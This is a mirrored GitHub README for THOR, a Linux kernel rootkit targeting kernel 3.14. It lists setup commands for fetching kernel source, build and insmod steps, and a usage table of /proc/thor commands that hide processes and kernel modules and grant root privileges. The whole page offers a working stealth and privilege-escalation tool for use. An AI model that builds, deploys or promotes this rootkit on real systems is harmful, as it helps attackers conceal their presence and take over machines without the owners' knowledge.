antonini / THOR

The Horrific Omnipotent Rootkit

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

THOR

The Horrific Omnipotent Rootkit - or something like that, targeted at kernel 3.14 (archlinux LTS at the time of writing).

Requirements

Apart from the linux kernel headers, the linux source code is required in order to build this rootkit since unexported code is used.

Just make sure /usr/src/linux points to the linux source directory of the target kernel. Or you could simply change the Makefile.

How to Setup (Arch)

# pacman -S abs linux-headers
# abs
# cd /var/abs/core/linux
# makepkg -o --asroot
# ln -s /var/abs/core/linux/src/linux-3.17 /usr/src/linux

How to Build

$ cd /path/to/thor
$ make
# insmod thor.ko

How to Use

usage:
   echo hp PID    > /proc/thor (hides process PID)
   echo up PID    > /proc/thor (unhides process PID)
   echo upa       > /proc/thor (unhide all PIDs)
   echo hm MODULE > /proc/thor (hide module)
   echo um MODULE > /proc/thor (unhide module)
   echo uma       > /proc/thor (unhide all modules)
   echo root      > /proc/thor (gain root privileges)

Authors

  • Franz-Josef Haider
  • Alex Hirsch

Acknowledgement

About

The Horrific Omnipotent Rootkit

License:GNU General Public License v3.0


Languages

Language:C 84.7%Language:Go 13.5%Language:Makefile 1.8%